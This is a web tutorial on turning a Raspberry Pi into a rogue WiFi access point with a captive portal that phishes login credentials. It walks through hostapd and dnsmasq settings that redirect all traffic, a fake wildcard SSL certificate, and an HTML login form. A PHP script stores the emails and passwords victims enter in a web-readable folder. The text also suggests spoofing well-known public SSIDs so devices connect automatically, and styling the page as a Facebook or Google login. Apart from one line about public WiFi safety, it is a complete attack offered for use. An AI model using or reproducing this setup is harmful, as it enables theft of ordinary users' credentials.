0 Google+ 0 Reddit 307 StumbleUpon 0 Pinterest 0

About: Setting up a Rogue Access Point on the Raspberry Pi is very easy. Our Access Point will act as a fake network providing free WiFi for our victim. It will have a captive portal which means any website that a user visits will be redirected to our login page where they will need to enter in their credentials to login. You can set the login page up to look like a Facebook or Google login page and name your network “Free Facebook WiFi”. The network I am setting up will not have any internet so everything will be contained on the Raspberry Pi. You can eventually bridge your connection with a 4G network or Ethernet to provide full internet access for users.

The tutorial today will demonstrate how unsafe public WiFi’s are and to never send any personal information over a public WiFi network. We can also setup our Access Point SSID to “attwifi” or “Starbucks”. If you set your access point’s SSID to a popular WiFi SSID then your victims phone will automatically connect to your network if they have been connected to the same SSID before. The reason for this is that your phone just looks at SSID names and not a MAC Address for a wireless network. This doesn’t apply to phones only, laptops or any WiFi enabled devices will all act the same way.

Objective: To setup a Rogue Access Point and make our network act as a Captive Portal to Phish Passwords

Material: You will need the following:

Raspberry Pi (Click the link to check out the price on Amazon. Usually around $36 with free shipping)

USB Wireless Adapter (I use the Alpha AWUS036H in this tutorial)

Instructions: Lets start off with a fresh Raspbian install. I installed Rasbian-Lite on my Raspberry Pi since I will be running it headless and will use SSH to connect to my Raspberry Pi. After you setup your Raspberry Pi lets run the update and upgrade

sudo apt-get update sudo apt-get upgrade 1 2 sudo apt - get update sudo apt - get upgrade

Net we will need to install the tools needed to setup our Access Point.

isc-dhcp-server is our DHCP server. We’ll need this to assign users an IP Address when they connect to our network. Hostapd is a user space daemon for wireless access point and authentication servers. DNSMasq is used as our DNS server and finally Apache2 is our web server. PHP5 will be used to get the login information and store it. Install these programs using the following command:

sudo apt-get install -y isc-dhcp-server hostapd dnsmasq apache2 php5 1 sudo apt - get install - y isc - dhcp - server hostapd dnsmasq apache2 php5

Next we will need to find the name of our Wireless card interface. I am using the Raspberry Pi 3 which has a built in WiFi card, however the Raspberry Pi 3 WiFi card is unable to act as an Access Point so I am using an external USB WiFi adapter. Use the following command to view a list of your interfaces:

ifconfig 1 ifconfig

You should see a list of all your interfaces. If you have a USB WiFi adapter attached it will most likely be name wlan1 and wlan0 will be the builtin WiFi card. Since I am using an external USB WiFi adapter my wireless interface name is “wlan1”.

Now lets edit the hostapd configuration file. We will setup the SSID name of our Rogue Access Point here as well as setting the channel number you want your access point to run on. Run the following command to edit your hostapd configuration file. You configuration file should be empty.

sudo nano /etc/hostapd/hostapd.conf 1 sudo nano / etc / hostapd / hostapd . conf

Now enter the following into the configuration file:

interface=wlan1 ssid=freefacebookwifi channel=1 1 2 3 interface = wlan1 ssid = freefacebookwifi channel = 1

Now hit CTRL+X to exit and save the configuration file.

Next we will edit the hostapd settings and link our configuration file in the setting. Type the following command:

sudo nano /etc/init.d/hostapd 1 sudo nano / etc / init . d / hostapd

Now look for DAEMON_CONF. It should be blank. We will add the path to the hostapd configuration file we created earlier here. Your DAEMON_CONF line should look like this now “DAEMON_CONF=/etc/hostapd/hostapd.conf”.

Now hit CTRL+X to exit and save the configuration file.

Next we will edit the dnsmasq configuration file. Open the file with the following command:

sudo nano /etc/dnsmasq.conf 1 sudo nano / etc / dnsmasq . conf

Now scroll all the way to the bottom and add the following lines. Remember to keep the same interface name that you got before.

address=/#/10.0.0.1 interface=wlan1 dhcp-range=10.0.0.10,10.0.0.250,12h 1 2 3 address = / #/10.0.0.1 interface = wlan1 dhcp - range = 10.0.0.10 , 10.0.0.250 , 12h

The address line will redirect all traffic to 10.0.0.1 which we will set as our WiFi IP Address in the next step. The interface is our interface name. The dhcp-range line is the available IP Addresses that will be assigned to users who connect to our access point.

Hit CTRL+X to exit and save the configuration file.

Now lets set up our wlan1 interface to be static and to match the IP Address we assigned earlier from the dnsmasq configuration file. Type the following command to edit the interfaces:

sudo nano /etc/network/interfaces 1 sudo nano / etc / network / interfaces

We will need to edit the interface for the wireless card you are working with. I will be editing the wlan1 interface settings. Change your interface settings to the following:

iface wlan1 inet static address 10.0.0.1 netmask 255.255.255.0 broadcast 255.0.0.0 1 2 3 4 iface wlan1 inet static address 10.0.0.1 netmask 255.255.255.0 broadcast 255.0.0.0

Now hit CTRL+X to exit and save the configuration file.

Run the following commands to update the changes to our system:

sudo update-rc.d apache2 defaults sudo update-rc.d hostapd defaults sudo update-rc.d dnsmasq defaults 1 2 3 sudo update - rc . d apache2 defaults sudo update - rc . d hostapd defaults sudo update - rc . d dnsmasq defaults

We are almost done, lets create a fake SSL certificate so that if someone browses a site that needs an SSL certificate our’s will be provided. This may not always work depending on the users browser and they might get a warning saying that the certificate is invalid.

Lets create the folder where we will store our certificate:

sudo mkdir /etc/apache2/ssl 1 sudo mkdir / etc / apache2 / ssl

Run the following command to create the certificate. Fill out the requested data. The answer’s don’t matter. The only one that matters is the Common Name. Put “*” for the Common Name.

sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/apache2/ssl/server.crt -keyout /etc/apache2/ssl/server.key 1 sudo openssl req - x509 - nodes - days 1095 - newkey rsa : 2048 - out / etc / apache2 / ssl / server . crt - keyout / etc / apache2 / ssl / server . key

Now lets enable SSL on the Apache web service with the mod rewrite command:

sudo a2enmod ssl 1 sudo a2enmod ssl

Now we will create a hard link between the 2 Apache web directories

sudo ln -s /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-enabled/000-default-ssl.conf

sudo ln -s /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-enabled/000-default-ssl.conf 1 sudo ln - s / etc / apache2 / sites - available / default - ssl . conf / etc / apache2 / sites - enabled / 000 - default - ssl . conf

Now lets modify the Apache SSL config file and link it to our created SSL certificate:

sudo nano /etc/apache2/sites-enabled/000-default-ssl.conf 1 sudo nano / etc / apache2 / sites - enabled / 000 - default - ssl . conf

Scroll down a bit and find the two lines that start with SSLCertificate and change them as follows:

SSLCertificateFile /etc/apache2/ssl/server.crt SSLCertificateKeyFile /etc/apache2/ssl/server.key 1 2 SSLCertificateFile / etc / apache2 / ssl / server . crt SSLCertificateKeyFile / etc / apache2 / ssl / server . key

Finally restart the Apache server for all our changes to take affect:

sudo /etc/init.d/apache2 restart 1 sudo / etc / init . d / apache2 restart

That’s basically it. We have created a Rogue Wireless Access Point and all websites will redirect to our web server. There is no internet connection so whoever connects will not have any internet access. You can redirect all WiFi traffic to another 4G data card or Ethernet but I will not be showing you that in this tutorial. What I will show you is how to use this to steal user names and passwords using a fake login.

Have you ever logged into a free WiFi hot-spot and you have to accept the terms and conditions before you can access the internet? Well I will show you how to create a very basic login which you will be able to recover the users inputted data. You can disguise the website to make it look like a Facebook or Google login if you like.

Let’s start by changing the permissions for our web servers directory and then remove the default home page:

sudo chmod 777 /var/www/html sudo rm /var/www/html/index.html - remove default apache home file 1 2 sudo chmod 777 / var / www / html sudo rm / var / www / html / index . html - remove default apache home file

Create a folder to store our usernames and passwords:

sudo mkdir /var/www/html/passwords sudo chmod 777 /var/www/html/passwords 1 2 sudo mkdir / var / www / html / passwords sudo chmod 777 / var / www / html / passwords

Now lets create our main login homepage which every site will redirect to:

sudo nano /var/www/html/index.php 1 sudo nano / var / www / html / index . php

Put the following HTML code into the file we just created and then hit CTRL+X to exit and save the file:

<html> <body> <form action="submit.php" method="post"> Email Address:<br> <input type="text" name="uname"> <br> Password:<br> <input type="password" name="password"> <br><br> <input type="submit" value="Submit"> </form> </body> </html> 1 2 3 4 5 6 7 8 9 10 11 12 13 < html > < body > < form action = "submit.php" method = "post" > Email Address : < br > < input type = "text" name = "uname" > < br > Password : < br > < input type = "password" name = "password" > < br > < br > < input type = "submit" value = "Submit" > < / form > < / body > < / html >

This will create a basic login page where the user can enter an email and password. Now lets create the submit.php file which will store the email and password that the user enters.

sudo nano /var/www/html/submit.php 1 sudo nano / var / www / html / submit . php

Put the following code into the submit.php file we just created and then hit CTRL+X to exit and save the file:

<?php $filename = "/var/www/html/passwords/".$_POST["uname"]." - ".time(); // Open the file to get existing content $current = file_get_contents($filename); // Append a new person to the file $current .= $_POST["uname"]." - ".$_POST["password"]."

"; // Write the contents back to the file file_put_contents($filename, $current); ?> Success, You have logged in. You can now use the free internet! 1 2 3 4 5 6 7 8 9 10 11 12 <?php $filename = "/var/www/html/passwords/" . $_POST [ "uname" ] . " - " . time ( ) ; // Open the file to get existing content $current = file_get_contents ( $filename ) ; // Append a new person to the file $current . = $_POST [ "uname" ] . " - " . $_POST [ "password" ] . "

" ; // Write the contents back to the file file_put_contents ( $filename , $current ) ; ?> Success , You have logged in . You can now use the free internet !

This will store the emails and passwords that are entered on our form. Everything will be stored as a text file in the “passwords” folder we created earlier. The filenames will be the email followed by the unix time.

Restart your Raspberry Pi for everything to start working and your access point starts to show up.

sudo restart 1 sudo restart

That’s it! To test it out use your phone or laptop to connect to your created WiFi and navigate to any website. You should see the following:

Now if we add /passwords/ to the end of any website we should see a list of all the submitted forms:

Clicking on the files will show you the email and password that was entered: